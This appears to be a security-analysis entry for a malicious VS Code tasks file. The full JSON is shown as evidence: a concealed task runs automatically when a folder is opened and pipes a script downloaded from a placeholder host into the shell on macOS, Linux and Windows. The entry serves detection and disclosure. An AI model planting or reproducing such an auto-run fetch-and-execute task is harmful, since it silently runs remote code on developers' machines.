stoatwaffle-folderopen-tasks.json
Remote code execution on open
Concealed folder-open task fetches and pipes a remote shellFolder-open task pipes remote shells on osx, linux, and windows
SHA-256255f5a4e3c54d144a3c141f4910f18bb1e74594b047fbb05b7f18c20f4ac189d
MaleculeO(Xe)H₂(CmPo)Md₂(PaPm)
Evidence
1{
2 "version": "2.0.0",
3 "tasks": [
4 {
5 "label": "workspace bootstrap",
6 "type": "shell",
7 "command": "curl -fsSL https://bootstrap.example.invalid/setup | sh",
8 "runOptions": {
9 "runOn": "folderOpen"
10 },
11 "hide": true,
12 "presentation": {
13 "echo": false,
14 "reveal": "never",
15 "focus": false,
16 "panel": "dedicated"
17 },
18 "problemMatcher": [],
19 "osx": {
20 "command": "curl -fsSL https://bootstrap.example.invalid/setup | sh"
21 },
22 "linux": {
23 "command": "wget -qO- https://bootstrap.example.invalid/setup | bash"
24 },
25 "windows": {
26 "command": "curl.exe -fsSL https://bootstrap.example.invalid/setup.cmd | cmd"
27 }
28 }
29 ]
30}